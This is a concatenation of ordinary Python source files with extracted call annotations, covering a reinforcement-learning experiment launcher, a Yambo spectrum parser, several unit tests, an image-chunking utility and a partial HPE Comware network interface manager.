policy_params=dict(
fc1_size=400,
fc2_size=300,
cell_class=GRUCell,
output_activation=F.tanh,
only_one_fc_for_action=False,
),
es_params=dict(
env_es_class=OUStrategy,
env_es_params=dict(
max_sigma=1,
min_sigma=None,
),
memory_es_class=OUStrategy,
memory_es_params=dict(
max_sigma=1,
min_sigma=None,
),
),
version=version,
)
for subtraj_length in [1, 5, 10, 15, 20, 25]:
variant['algo_params']['subtraj_length'] = subtraj_length
for exp_id, (
write_policy_optimizes,
version,
) in enumerate([
("bellman", "Bellman Error"),
("qf", "Q-Function"),
("both", "Both"),
]):
variant['algo_params']['write_policy_optimizes'] = (
write_policy_optimizes
)
variant['version'] = version
for _ in range(n_seeds):
seed = random.randint(0, 10000)
run_experiment(
bptt_ddpg_launcher,
exp_prefix=exp_prefix,
seed=seed,
mode=mode,
variant=variant,
exp_id=exp_id,
)
| [
"random.randint",
"railrl.launchers.launcher_util.run_experiment"
] | [((3523, 3547), 'random.randint', 'random.randint', (['(0)', '(10000)'], {}), '(0, 10000)\n', (3537, 3547), False, 'import random\n'), ((3564, 3680), 'railrl.launchers.launcher_util.run_experiment', 'run_experiment', (['bptt_ddpg_launcher'], {'exp_prefix': 'exp_prefix', 'seed': 'seed', 'mode': 'mode', 'variant': 'variant', 'exp_id': 'exp_id'}), '(bptt_ddpg_launcher, exp_prefix=exp_prefix, seed=seed, mode=\n mode, variant=variant, exp_id=exp_id)\n', (3578, 3680), False, 'from railrl.launchers.launcher_util import run_experiment\n')] |
"""Classes for use with Yambo
Representation of a spectrum.
Main functionality is to read from Yambo output, o.qp files
and also netcdf databases.
"""
import re
import copy as cp
import numpy as np
import asetk.atomistic.fundamental as fu
import asetk.atomistic.constants as atc
from . import cube
class Dispersion:
"""A Dispersion holds the k-points belonging to one spin"""
def __init__(self, energylevels=None, kvectors=None, weights=None):
"""Set up spectrum from a list of EnergyLevels."""
self.__energylevels = energylevels
self.__kvectors = kvectors
self.__weights = weights
@property
def energylevels(self):
"""Returns energylevelsi of all k-points."""
return self.__energylevels
@property
def kvectors(self):
return self.__kvectors
@property
def weights(self):
return self.__weights
@property
def energies(self):
"""Returns list of energy levels of all k-points."""
list = [el.energies for el in self.__energylevels]
return np.concatenate(list)
@property
def occupations(self):
"""Returns list of level occupations of all k-points."""
os = []
for el in self.__energylevels:
os = os + list(el.occupations)
return os
def copy(self, dispersion):
"""Performs deep copy of dispersion."""
self.__energylevels = [ el.copy() for el in dispersion.__energylevels ]
self.__kvectors = cp.copy(spectrum.__kvectors)
self.__weights = cp.copy(spectrum.__weights)
def shift(self, de):
for levels in self.__energylevels:
levels.shift(de)
def __str__(self):
text = "Dispersion containing {} k-points\n".format(len(self.__energylevels))
for i in range(len(self.__energylevels)):
e = self.__energylevels[i]
k = self.__kvectors[i]
text += 'k = ({:6.3f}, {:6.3f}, {:6.3f})'.format(k[0], k[1], k[2])
if self.__weights:
w = self.__weights[i]
text += ', w = {}'.format(w)
text += ' : {}\n'.format(e.__str__())
return text
def __getitem__(self, index):
return self.__energylevels[index]
@property
def nk(self):
return len(self.energylevels)
class Spectrum(object):
"""A Spectrum holds the data belonging to all spins"""
def __init__(self, energylevels=None):
"""Set up spectrum from a list of EnergyLevels."""
self.dispersions = [ Dispersion(energylevels) ]
@classmethod
def from_output(cls, fname, mode='QP'):
"""Creates Spectrum from Yambo output file"""
tmp = Spectrum()
tmp.read_from_output(fname, mode)
return tmp
@classmethod
def from_qp(cls, fname=None, mode='QP'):
"""Creates Spectrum from Yambo o.qp file"""
tmp = Spectrum()
tmp.read_from_qp(fname, mode)
return tmp
@classmethod
def from_netcdf_db(cls, fname=None, mode='QP'):
"""Creates Spectrum from Yambo netcdf database"""
tmp = Spectrum()
tmp.read_from_netcdf_db(fname, mode=mode)
return tmp
@property
def energies(self):
"""Returns list of energies e[ispin][ibnd]."""
list = [disp.energies for disp in self.dispersions]
return list
@property
def energylevels(self):
"""Returns list of Energylevels l[ispin][ibnd]."""
list = []
for d in self.dispersions:
sum = fu.Energylevels()
for el in d.energylevels:
sum += el
list.append(sum)
return list
@property
def occupations(self):
"""Returns list of level occupations of all spins."""
os = []
for disp in self.dispersions:
os = os + disp.occupations
return os
@property
def nspin(self):
return len(self.dispersions)
def copy(self, spectrum):
"""Performs deep copy of spectrum."""
self.dispersions = [ el.copy() for el in spectrum.dispersions ]
self.spins = cp.copy(spectrum.spins)
def shift(self, de):
for disp in self.dispersions:
disp.shift(de)
def __str__(self):
text = "Spectrum containing {} spins\n".format(len(self.dispersions))
for i in range(len(self.dispersions)):
d = self.dispersions[i]
s = self.spins[i]
text += 'spin {} : {}\n'.format(s+1, d.__str__())
return text
def __getitem__(self, index):
return self.levels[index]
def read_from_output(self, fname, mode=None):
s = open(fname, 'r').read()
floatregex = '-?\d+\.\d+'
lineregex='[^\r\n]*\r?\n'
#blanklineregex='(?:^\s*$)'
if mode == 'DFT' or mode == None:
kptregex = 'X\* K.*?: ({f})\s*({f})\s*({f}).*?weight\s*({f}){l}(.*?)[\*\[]'\
.format(f=floatregex,l=lineregex)
fermiregex='Fermi Level.*?:(\s*[\-\d\.]+)'
elif mode == 'QP':
kptregex = 'Q?P \[eV\].*?:\s*({f})\s+({f})\s+({f})(.*?)[Q\[]'\
.format(f=floatregex)
self.spins=[]
self.dispersions=[]
# No spin for the moment, but shouldn't be too difficult to extend
for spin in [0]:
disp = Dispersion()
matches=re.findall(kptregex, s, re.DOTALL)
if mode == 'DFT' or mode == None:
fermi = float(re.search(fermiregex, s).group(1))
energylevels = []
kvectors = []
weights = []
for match in matches:
kx, ky, kz, weight, ldata = match
kvectors.append( np.array([kx, ky, kz], dtype=float) )
weights.append( float(weight) )
energies = re.findall('({f})'.format(f=floatregex), ldata, re.DOTALL)
energies = np.array(energies, dtype=float)
levels = fu.EnergyLevels(energies=energies,occupations=None, fermi=fermi)
energylevels.append(levels)
disp = Dispersion(energylevels=energylevels, kvectors=kvectors, weights=weights)
elif mode == 'QP':
energylevels = []
kvectors = []
for match in matches:
kx, ky, kz, ldata = match
kvectors.append( np.array([kx, ky, kz], dtype=float) )
energies = re.findall('E=\s*({f})'.format(f=floatregex), ldata, re.DOTALL)
energies = np.array(energies, dtype=float)
levels = fu.EnergyLevels(energies=energies)
energylevels.append(levels)
disp = Dispersion(energylevels=energylevels, kvectors=kvectors)
self.dispersions.append(disp)
self.spins.append(spin)
def read_from_qp(self, fname="o.qp", ihomo=None):
"""Read from o.qp output (has more digits than in report.
Anyhow, the proper way would be to read the database"""
s = open(fname, 'r').read()
data = np.genfromtxt(fname, dtype=float)
energies = data[:,2] + data[:,3]
# setting HOMO to zero
if ihomo:
energies -= energies[ihomo]
self.spins=[]
self.dispersions=[]
# No spin for the moment, but shouldn't be too difficult to extend
for spin in [0]:
levels = fu.EnergyLevels(energies=energies,occupations=None)
disp = Dispersion(energylevels=[levels], kvectors = [ (0,0,0) ] )
self.dispersions.append(disp)
self.spins.append(spin)
def read_from_netcdf_db(self, fname="ndb.QP", mode="QP"):
"""Read from netCDF database
requires netCDF4 python module"""
from netCDF4 import Dataset
f = Dataset(fname, 'r')
SPIN_VARS = f.variables['SPIN_VARS'][:]
QP_kpts = f.variables['QP_kpts'][:]
QP_table = f.variables['QP_table'][:]
QP_E_Eo_Z = f.variables['QP_E_Eo_Z'][:]
f.close()
nspin = len(SPIN_VARS)
nk = QP_kpts.shape[1]
kpts = [ QP_kpts[:,ik] for ik in range(nk) ]
ibnds, dum, iks, ispins = QP_table
nbnd = len(ibnds) / (nspin * nk)
if mode == "QP":
iener = 0
elif mode == "DFT":
iener = 1
else:
print("Error: Did not recognize mode '{}'.".format(mode))
self.spins=[]
self.dispersions=[]
for ispin in range(nspin):
is_spin = np.where(ispins == SPIN_VARS[ispin])[0]
energylevels = []
kvectors = []
for ik in range(nk):
k = kpts[ik]
is_k = np.where(iks == ik+1)[0]
# still need to figure out the first index
# is it real vs. complex?
e = QP_E_Eo_Z[0, np.intersect1d(is_spin,is_k), iener] * atc.Ha / atc.eV
levels = fu.EnergyLevels(energies=e,occupations=None)
kvectors.append(k)
energylevels.append(levels)
disp = Dispersion(energylevels=energylevels, kvectors = kvectors)
self.dispersions.append(disp)
self.spins.append(ispin)
## setting HOMO to zero
#if ihomo:
# energies -= energies[ihomo]
| [
"numpy.intersect1d",
"numpy.where",
"netCDF4.Dataset",
"asetk.atomistic.fundamental.Energylevels",
"re.findall",
"numpy.array",
"numpy.concatenate",
"copy.copy",
"numpy.genfromtxt",
"asetk.atomistic.fundamental.EnergyLevels",
"re.search"
] | [((1070, 1090), 'numpy.concatenate', 'np.concatenate', (['list'], {}), '(list)\n', (1084, 1090), True, 'import numpy as np\n'), ((1501, 1529), 'copy.copy', 'cp.copy', (['spectrum.__kvectors'], {}), '(spectrum.__kvectors)\n', (1508, 1529), True, 'import copy as cp\n'), ((1555, 1582), 'copy.copy', 'cp.copy', (['spectrum.__weights'], {}), '(spectrum.__weights)\n', (1562, 1582), True, 'import copy as cp\n'), ((4129, 4152), 'copy.copy', 'cp.copy', (['spectrum.spins'], {}), '(spectrum.spins)\n', (4136, 4152), True, 'import copy as cp\n'), ((7232, 7265), 'numpy.genfromtxt', 'np.genfromtxt', (['fname'], {'dtype': 'float'}), '(fname, dtype=float)\n', (7245, 7265), True, 'import numpy as np\n'), ((7987, 8006), 'netCDF4.Dataset', 'Dataset', (['fname', '"""r"""'], {}), "(fname, 'r')\n", (7994, 8006), False, 'from netCDF4 import Dataset\n'), ((3540, 3557), 'asetk.atomistic.fundamental.Energylevels', 'fu.Energylevels', ([], {}), '()\n', (3555, 3557), True, 'import asetk.atomistic.fundamental as fu\n'), ((5402, 5436), 're.findall', 're.findall', (['kptregex', 's', 're.DOTALL'], {}), '(kptregex, s, re.DOTALL)\n', (5412, 5436), False, 'import re\n'), ((7585, 7637), 'asetk.atomistic.fundamental.EnergyLevels', 'fu.EnergyLevels', ([], {'energies': 'energies', 'occupations': 'None'}), '(energies=energies, occupations=None)\n', (7600, 7637), True, 'import asetk.atomistic.fundamental as fu\n'), ((8712, 8748), 'numpy.where', 'np.where', (['(ispins == SPIN_VARS[ispin])'], {}), '(ispins == SPIN_VARS[ispin])\n', (8720, 8748), True, 'import numpy as np\n'), ((9134, 9179), 'asetk.atomistic.fundamental.EnergyLevels', 'fu.EnergyLevels', ([], {'energies': 'e', 'occupations': 'None'}), '(energies=e, occupations=None)\n', (9149, 9179), True, 'import asetk.atomistic.fundamental as fu\n'), ((5987, 6018), 'numpy.array', 'np.array', (['energies'], {'dtype': 'float'}), '(energies, dtype=float)\n', (5995, 6018), True, 'import numpy as np\n'), ((6048, 6113), 'asetk.atomistic.fundamental.EnergyLevels', 
'fu.EnergyLevels', ([], {'energies': 'energies', 'occupations': 'None', 'fermi': 'fermi'}), '(energies=energies, occupations=None, fermi=fermi)\n', (6063, 6113), True, 'import asetk.atomistic.fundamental as fu\n'), ((8895, 8918), 'numpy.where', 'np.where', (['(iks == ik + 1)'], {}), '(iks == ik + 1)\n', (8903, 8918), True, 'import numpy as np\n'), ((5774, 5809), 'numpy.array', 'np.array', (['[kx, ky, kz]'], {'dtype': 'float'}), '([kx, ky, kz], dtype=float)\n', (5782, 5809), True, 'import numpy as np\n'), ((6661, 6692), 'numpy.array', 'np.array', (['energies'], {'dtype': 'float'}), '(energies, dtype=float)\n', (6669, 6692), True, 'import numpy as np\n'), ((6722, 6756), 'asetk.atomistic.fundamental.EnergyLevels', 'fu.EnergyLevels', ([], {'energies': 'energies'}), '(energies=energies)\n', (6737, 6756), True, 'import asetk.atomistic.fundamental as fu\n'), ((5515, 5539), 're.search', 're.search', (['fermiregex', 's'], {}), '(fermiregex, s)\n', (5524, 5539), False, 'import re\n'), ((6496, 6531), 'numpy.array', 'np.array', (['[kx, ky, kz]'], {'dtype': 'float'}), '([kx, ky, kz], dtype=float)\n', (6504, 6531), True, 'import numpy as np\n'), ((9054, 9083), 'numpy.intersect1d', 'np.intersect1d', (['is_spin', 'is_k'], {}), '(is_spin, is_k)\n', (9068, 9083), True, 'import numpy as np\n')] |
import unittest
import os
import json
import pandas as pd
import numpy as np
class TestingExercise2_07(unittest.TestCase):
def setUp(self) -> None:
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(ROOT_DIR, '..', 'dtypes.json'), 'r') as jsonfile:
self.dtyp = json.load(jsonfile)
self.data = pd.read_csv(os.path.join(ROOT_DIR, '..', 'Datasets', 'earthquake_data.csv'),
dtype = self.dtyp)
def test_object_vars(self):
self.object_variables = self.data.select_dtypes(include = [np.object]).nunique().sort_values()
self.assertEqual(max(self.object_variables), (3821))
if __name__ == '__main__':
unittest.main() | [
"unittest.main",
"json.load",
"os.path.abspath",
"os.path.join"
] | [((718, 733), 'unittest.main', 'unittest.main', ([], {}), '()\n', (731, 733), False, 'import unittest\n'), ((188, 213), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (203, 213), False, 'import os\n'), ((321, 340), 'json.load', 'json.load', (['jsonfile'], {}), '(jsonfile)\n', (330, 340), False, 'import json\n'), ((373, 436), 'os.path.join', 'os.path.join', (['ROOT_DIR', '""".."""', '"""Datasets"""', '"""earthquake_data.csv"""'], {}), "(ROOT_DIR, '..', 'Datasets', 'earthquake_data.csv')\n", (385, 436), False, 'import os\n'), ((234, 277), 'os.path.join', 'os.path.join', (['ROOT_DIR', '""".."""', '"""dtypes.json"""'], {}), "(ROOT_DIR, '..', 'dtypes.json')\n", (246, 277), False, 'import os\n')] |
from uuid import UUID
from sqlalchemy import select, bindparam
from nivo_api.cli.bra_record_helper.persist import persist_zone, persist_massif
from nivo_api.core.db.connection import connection_scope
from nivo_api.core.db.models.sql.bra import ZoneTable, DepartmentTable, MassifTable
from test.pytest_fixtures import database
class TestPersistZone:
def test_insert_zone(self, database):
with connection_scope(database.engine) as con:
r = persist_zone(con, "this_is_a_test")
assert isinstance(r, UUID)
def test_multi_insert(self, database):
with connection_scope(database.engine) as con:
uuid_list = list()
for _ in range(5):
uuid_list.append(persist_zone(con, "this_is_a_test"))
for x in uuid_list:
assert isinstance(x, UUID)
assert all(x == uuid_list[0] for x in uuid_list)
class TestPersistMassif:
def test_massif(self, database):
with connection_scope(database.engine) as con:
r = persist_massif(
con,
"CHABLAIS",
{"name": "Haute-savoie", "number": "74"},
"Alpes du Nord",
)
assert isinstance(r, UUID)
def test_multi_massif(self, database):
with connection_scope(database.engine) as con:
r1 = persist_massif(
con,
"CHABLAIS",
{"name": "Haute-savoie", "number": "74"},
"Alpes du Nord",
)
r2 = persist_massif(
con,
"MONT-BLANC",
{"name": "Haute-savoie", "number": "74"},
"Alpes du Nord",
)
assert isinstance(r1, UUID)
assert isinstance(r2, UUID)
req = (
select([ZoneTable.c.z_id, DepartmentTable.c.d_id])
.select_from(ZoneTable.join(DepartmentTable).join(MassifTable))
.where(MassifTable.c.m_id == bindparam("massif"))
)
id1 = con.execute(req, massif=r1).first()
id2 = con.execute(req, massif=r2).first()
assert id1.z_id == id2.z_id
assert id1.d_id == id2.d_id
class TestPersistBra:
def test_persist_bra(self):
raise NotImplementedError()
| [
"nivo_api.core.db.connection.connection_scope",
"nivo_api.cli.bra_record_helper.persist.persist_zone",
"sqlalchemy.bindparam",
"sqlalchemy.select",
"nivo_api.core.db.models.sql.bra.ZoneTable.join",
"nivo_api.cli.bra_record_helper.persist.persist_massif"
] | [((410, 443), 'nivo_api.core.db.connection.connection_scope', 'connection_scope', (['database.engine'], {}), '(database.engine)\n', (426, 443), False, 'from nivo_api.core.db.connection import connection_scope\n'), ((468, 503), 'nivo_api.cli.bra_record_helper.persist.persist_zone', 'persist_zone', (['con', '"""this_is_a_test"""'], {}), "(con, 'this_is_a_test')\n", (480, 503), False, 'from nivo_api.cli.bra_record_helper.persist import persist_zone, persist_massif\n'), ((600, 633), 'nivo_api.core.db.connection.connection_scope', 'connection_scope', (['database.engine'], {}), '(database.engine)\n', (616, 633), False, 'from nivo_api.core.db.connection import connection_scope\n'), ((991, 1024), 'nivo_api.core.db.connection.connection_scope', 'connection_scope', (['database.engine'], {}), '(database.engine)\n', (1007, 1024), False, 'from nivo_api.core.db.connection import connection_scope\n'), ((1049, 1143), 'nivo_api.cli.bra_record_helper.persist.persist_massif', 'persist_massif', (['con', '"""CHABLAIS"""', "{'name': 'Haute-savoie', 'number': '74'}", '"""Alpes du Nord"""'], {}), "(con, 'CHABLAIS', {'name': 'Haute-savoie', 'number': '74'},\n 'Alpes du Nord')\n", (1063, 1143), False, 'from nivo_api.cli.bra_record_helper.persist import persist_zone, persist_massif\n'), ((1315, 1348), 'nivo_api.core.db.connection.connection_scope', 'connection_scope', (['database.engine'], {}), '(database.engine)\n', (1331, 1348), False, 'from nivo_api.core.db.connection import connection_scope\n'), ((1374, 1468), 'nivo_api.cli.bra_record_helper.persist.persist_massif', 'persist_massif', (['con', '"""CHABLAIS"""', "{'name': 'Haute-savoie', 'number': '74'}", '"""Alpes du Nord"""'], {}), "(con, 'CHABLAIS', {'name': 'Haute-savoie', 'number': '74'},\n 'Alpes du Nord')\n", (1388, 1468), False, 'from nivo_api.cli.bra_record_helper.persist import persist_zone, persist_massif\n'), ((1561, 1657), 'nivo_api.cli.bra_record_helper.persist.persist_massif', 'persist_massif', (['con', 
'"""MONT-BLANC"""', "{'name': 'Haute-savoie', 'number': '74'}", '"""Alpes du Nord"""'], {}), "(con, 'MONT-BLANC', {'name': 'Haute-savoie', 'number': '74'},\n 'Alpes du Nord')\n", (1575, 1657), False, 'from nivo_api.cli.bra_record_helper.persist import persist_zone, persist_massif\n'), ((737, 772), 'nivo_api.cli.bra_record_helper.persist.persist_zone', 'persist_zone', (['con', '"""this_is_a_test"""'], {}), "(con, 'this_is_a_test')\n", (749, 772), False, 'from nivo_api.cli.bra_record_helper.persist import persist_zone, persist_massif\n'), ((2025, 2044), 'sqlalchemy.bindparam', 'bindparam', (['"""massif"""'], {}), "('massif')\n", (2034, 2044), False, 'from sqlalchemy import select, bindparam\n'), ((1849, 1899), 'sqlalchemy.select', 'select', (['[ZoneTable.c.z_id, DepartmentTable.c.d_id]'], {}), '([ZoneTable.c.z_id, DepartmentTable.c.d_id])\n', (1855, 1899), False, 'from sqlalchemy import select, bindparam\n'), ((1929, 1960), 'nivo_api.core.db.models.sql.bra.ZoneTable.join', 'ZoneTable.join', (['DepartmentTable'], {}), '(DepartmentTable)\n', (1943, 1960), False, 'from nivo_api.core.db.models.sql.bra import ZoneTable, DepartmentTable, MassifTable\n')] |
import itertools
import numpy as np
from jspp_imageutils.image.types import GenImgArray, GenImgBatch
from typing import Tuple, Iterable, Iterator
# TODO: fix everywhere the x and y axis nomenclature
"""
chunk_image_on_position -> returns images
chunk_image_generator -> returns images
chunk_data_image_generator -> returns batches of data
"""
def chunk_image_on_position(arr_img: GenImgArray,
x_pos: Iterable[int], y_pos: Iterable[int],
dimensions: Tuple[int, int] = (50, 50),
warn_leftovers=True) -> \
Iterator[Tuple[int, int, GenImgArray]]:
# TODO decide if this should handle centering the points ...
x_ends = [x + dimensions[0] for x in x_pos]
y_ends = [y + dimensions[1] for y in y_pos]
i = 0
# TODO find a better way to indent this ...
for y_start, y_end, x_start, x_end in \
zip(y_pos, y_ends, x_pos, x_ends):
temp_arr_img = arr_img[x_start:x_end, y_start:y_end, ]
if temp_arr_img.shape[0:2] == dimensions:
yield x_start, y_start, temp_arr_img
i += 1
else:
if warn_leftovers:
print("skipping chunk due to weird size",
str(temp_arr_img.shape))
print("Image generator yielded ", str(i), " images")
def chunk_image_generator(img,
chunk_size: Tuple[int, int] = (500, 500),
displacement: Tuple[int, int] = (250, 250),
warn_leftovers=True) -> \
Iterator[Tuple[int, int, GenImgArray]]:
"""
Gets an image read with tensorflow.keras.preprocessing.image.load_img
and returns a generator that iterates over rectangular areas of it.
chunks are of dims (chunk_size, colors)
"""
# TODO unify the input for this guy ...
arr_img = np.asarray(img)
dims = arr_img.shape
x_starts = [
displacement[0] * x for x in range(dims[0] // displacement[0])
]
x_starts = [x for x in x_starts if
x >= 0 & (x + chunk_size[0]) < dims[0]]
y_starts = [
displacement[1] * y for y in range(dims[1] // displacement[1])
]
y_starts = [y for y in y_starts if
y >= 0 & (y + chunk_size[1]) < dims[1]]
coord_pairs = itertools.product(x_starts, y_starts)
coord_pairs = np.array(list(coord_pairs))
my_gen = chunk_image_on_position(
arr_img, coord_pairs[:, 0], coord_pairs[:, 1],
dimensions=chunk_size, warn_leftovers=warn_leftovers)
for chunk in my_gen:
yield(chunk)
def chunk_data_image_generator(img: GenImgArray,
                               chunk_size: Tuple[int, int] = (500, 500),
                               displacement: Tuple[int, int] = (250, 250),
                               batch: int = 16) -> GenImgBatch:
    """
    chunk_data_image_generator [summary]
    Gets an image read with tensorflow.keras.preprocessing.image.load_img
    and returns a generator that iterates over BATCHES of rectangular
    areas of it
    dimensions are (batch, chunk_size, colors)

    :param img: [description]
    :type img: GenImgArray
    :param chunk_size: [description], defaults to (500, 500)
    :type chunk_size: Tuple[int, int], optional
    :param displacement: [description], defaults to (250, 250)
    :type displacement: Tuple[int, int], optional
    :param batch: [description], defaults to 16
    :type batch: int, optional
    :return: [description]
    :rtype: GenImgBatch
    """
    img_generator = chunk_image_generator(
        img=img, chunk_size=chunk_size,
        displacement=displacement)
    counter = 0
    img_buffer = []
    for _, _, temp_arr_img in img_generator:
        # Prepend a length-1 batch axis so chunks can be concatenated.
        tmp_arr_dims = temp_arr_img.shape
        temp_arr_img = temp_arr_img.reshape(1, *tmp_arr_dims)
        img_buffer.append(temp_arr_img)
        counter += 1
        if counter == batch:
            yield np.concatenate(img_buffer)
            counter = 0
            img_buffer = []
    # BUG FIX: only flush the trailing partial batch when it is non-empty.
    # ``np.concatenate([])`` raises ValueError, which the old code hit
    # whenever the total chunk count was an exact multiple of ``batch``.
    if img_buffer:
        yield np.concatenate(img_buffer)
| [
"itertools.product",
"numpy.asarray",
"numpy.concatenate"
] | [((1915, 1930), 'numpy.asarray', 'np.asarray', (['img'], {}), '(img)\n', (1925, 1930), True, 'import numpy as np\n'), ((2354, 2391), 'itertools.product', 'itertools.product', (['x_starts', 'y_starts'], {}), '(x_starts, y_starts)\n', (2371, 2391), False, 'import itertools\n'), ((4118, 4144), 'numpy.concatenate', 'np.concatenate', (['img_buffer'], {}), '(img_buffer)\n', (4132, 4144), True, 'import numpy as np\n'), ((4026, 4052), 'numpy.concatenate', 'np.concatenate', (['img_buffer'], {}), '(img_buffer)\n', (4040, 4052), True, 'import numpy as np\n')] |
"""Manage interfaces on HPCOM7 devices.
"""
from pyhpecw7.utils.xml.lib import reverse_value_map
from pyhpecw7.features.errors import InterfaceCreateError, InterfaceTypeError,\
InterfaceAbsentError, InterfaceParamsError, InterfaceVlanMustExist
from pyhpecw7.features.vlan import Vlan
from pyhpecw7.utils.xml.lib import *
class Interface(object):
    """This class is used to get
    and build interface configurations on ``HPCOM7`` devices.

    Args:
        device (HPCOM7): connected instance of a
            ``pyhpecw7.comware.HPCOM7`` object.
        interface_name (str): The name of the interface.

    Attributes:
        device (HPCOM7): connected instance of a
            ``pyhpecw7.comware.HPCOM7`` object.
        interface_name (str): The name of the interface.
        iface_index (str): The device's internal number representation
            of an interface.
        iface_type (str): The type of interface,
            for example: 'LoopBack', 'FortyGigE'.
        is_ethernet (bool): Whether the interface is ethernet.
        is_routed (bool): Whether the interface is in layer 3 mode.
            If this is ``False``, the interface is either in bridged
            mode or does not exist.
        iface_exists (bool): Whether the interface exists. Physical
            interfaces should always exist. Logical interfaces may
            or may not exist.
    """
    def __init__(self, device, interface_name):
        # used to map key values from our dictionary model
        # to expected XML tags and vice versa
        self._key_map = {
            'admin': 'AdminStatus',
            'speed': 'ConfigSpeed',
            'duplex': 'ConfigDuplex',
            'description': 'Description',
            'type': 'PortLayer'
        }
        # used to map value values from our dictionary model
        # to expected XML tags and vice versa
        self._value_map = {
            'AdminStatus': {'1': 'up',
                            '2': 'down'},
            'ConfigSpeed': {'1': 'auto', '2': '10',
                            '4': '100', '32': '1000',
                            '1024': '10000', '4096': '20000',
                            '8192': '40000', '16384': '100000'},
            'ConfigDuplex': {'1': 'full',
                             '2': 'half',
                             '3': 'auto'},
            'PortLayer': {'1': 'bridged',
                          '2': 'routed'}
        }
        self._iface_types = set(['FortyGigE', 'Tunnel', 'LoopBack',
                                 'Vlan-interface', 'Bridge-Aggregation',
                                 'Route-Aggregation', 'GigabitEthernet',
                                 'Ten-GigabitEthernet'])
        # xml tags
        self._iface_row_name = 'Interface'
        self._iface_index_name = 'IfIndex'
        # used in conjunction with key map and value map above.
        # FIX: was ``dict(reversed(item) for item in
        # self._key_map.iteritems())`` -- ``iteritems`` exists only on
        # Python 2.  A dict comprehension works on Python 2.7 and 3.
        self._r_key_map = {v: k for k, v in self._key_map.items()}
        self._r_value_map = reverse_value_map(self._r_key_map, self._value_map)
        # connect to the device and get more information
        self.interface_name, self.iface_type = self._iface_type(interface_name)
        self.device = device
        # The interface index is needed for most interface NETCONF requests
        self.iface_index = self._get_iface_index()
        self.is_ethernet, self.is_routed = self._is_ethernet_is_routed()
        self.iface_exists = True if self.iface_index else False
    def _iface_type(self, if_name):
        """Return the normalized interface name and type
        from a denormalized interface name.
        """
        # Match on leading characters of the (case-insensitive) short name.
        if if_name.lower().startswith('gi'):
            if_type = 'GigabitEthernet'
        elif if_name.lower().startswith('ten'):
            if_type = 'Ten-GigabitEthernet'
        elif if_name.lower().startswith('fo'):
            if_type = 'FortyGigE'
        elif if_name.lower().startswith('vl'):
            if_type = 'Vlan-interface'
        elif if_name.lower().startswith('lo'):
            if_type = 'LoopBack'
        elif if_name.lower().startswith('br'):
            if_type = 'Bridge-Aggregation'
        elif if_name.lower().startswith('ro'):
            if_type = 'Route-Aggregation'
        elif if_name.lower().startswith('tu'):
            if_type = 'Tunnel'
        else:
            if_type = None
        # The numeric part either follows a space or is embedded in the name.
        number_list = if_name.split(' ')
        if len(number_list) == 2:
            number = number_list[-1].strip()
        else:
            number = self._get_number(if_name)
        if if_type:
            proper_interface = if_type + number
        else:
            proper_interface = if_name
        return proper_interface, if_type
    def _get_number(self, if_name):
        """Extract the digits (and slot separators '/') from an
        interface name, e.g. 'FortyGigE1/0/1' -> '1/0/1'.
        """
        digits = ''
        for char in if_name:
            if char.isdigit() or char == '/':
                digits += char
        return digits
    def _get_iface_index(self):
        """Return the interface index given the self.interface_name
        attribute by asking the device. If the interface doesn't exist,
        return the empty string.
        """
        E = data_element_maker()
        top = E.top(
            E.Ifmgr(
                E.Interfaces(
                    E.Interface(
                        E.Name(self.interface_name)
                    )
                )
            )
        )
        nc_get_reply = self.device.get(('subtree', top))
        reply_data = find_in_data(
            self._iface_index_name, nc_get_reply.data_ele)
        if reply_data is None:
            return ''
        return reply_data.text
    def _is_ethernet_is_routed(self):
        """Return whether the interface is ethernet and whether
        it is routed. If the interface doesn't exist,
        return False.
        """
        E = data_element_maker()
        top = E.top(
            E.Ifmgr(
                E.Interfaces(
                    E.Interface(
                        E.IfIndex(self.iface_index)
                    )
                )
            )
        )
        nc_get_reply = self.device.get(('subtree', top))
        reply_data = find_in_data('ifType', nc_get_reply.data_ele)
        routed_reply_data = find_in_data('PortLayer', nc_get_reply.data_ele)
        is_ethernet = False
        is_routed = False
        # ifType 6 == ethernetCsmacd; PortLayer 2 == routed.
        # AttributeError means the element was absent from the reply.
        try:
            if reply_data.text == '6':
                is_ethernet = True
        except AttributeError:
            pass
        try:
            if routed_reply_data.text == '2':
                is_routed = True
        except AttributeError:
            pass
        return is_ethernet, is_routed
    def update(self):
        """Update ``self.iface_index`` and ``self.iface_exists``.

        Usually called after a logical interface is created.

        Raises:
            InterfaceCreateError: if the interface hasn't yet
                been successfully created.

        Note:
            It is the responsibility of the caller to call ``update()``
            after staging (``create_logical()``) *and* executing
            (``execute()`` on this class's ``device`` object) of
            commands to create an interface.
        """
        if_index = self._get_iface_index()
        if not if_index:
            raise InterfaceCreateError(self.interface_name)
        self.iface_index = if_index
        self.iface_exists = True
    def get_default_config(self):
        """Return the default configuration of an interface.

        Returns:
            A dictionary of default interface configuration parameters,
            depending on the type of interface.
            For example, for ethernet interfaces::

                {
                    'description': 'FortyGigE1/0/1 Interface',
                    'admin': 'up',
                    'speed': 'auto',
                    'duplex': 'auto',
                    'type': 'bridged'
                }
        """
        if not self.iface_type:
            return None
        defaults = {}
        defaults['description'] = self.interface_name + ' Interface'
        defaults['admin'] = 'up'
        if self.is_ethernet:
            defaults['speed'] = 'auto'
            defaults['duplex'] = 'auto'
            defaults['type'] = 'bridged'
        elif self.iface_type == 'Bridge-Aggregation':
            defaults['type'] = 'bridged'
        else:
            defaults['type'] = 'routed'
        return defaults
    def param_check(self, **params):
        """Checks given parameters against the interface for various errors.

        Args:
            **params: see Keyword Args

        Keyword Args:
            admin (str): The up/down state of the interface.
                'up' or 'down'.
            speed (str): The speed of the interface, in Mbps.
            duplex (str): The duplex of the interface.
                'full', 'half', or 'auto'.
            description (str): The textual description of the interface.
            type (str): Whether the interface is in layer 2 or layer 3 mode.
                'bridged' or 'routed'.

        Raises:
            InterfaceTypeError: if the given interface isn't a valid type.
            InterfaceAbsentError: if the given interface is of type is_ethernet
                and doesn't exist.
            InterfaceParamsError: if 'speed' or 'duplex' are supplied for a
                non ethernet interface.
            InterfaceVlanMustExist: if the interface is of type
                'Vlan-interface' and the the associated vlan doesn't exist.
        """
        if not self.iface_type:
            raise InterfaceTypeError(
                self.interface_name, list(self._iface_types))
        if not self.iface_exists:
            if self.iface_type in {'FortyGigE', 'GigabitEthernet',
                                   'Ten-GigabitEthernet'}:
                raise InterfaceAbsentError(self.interface_name)
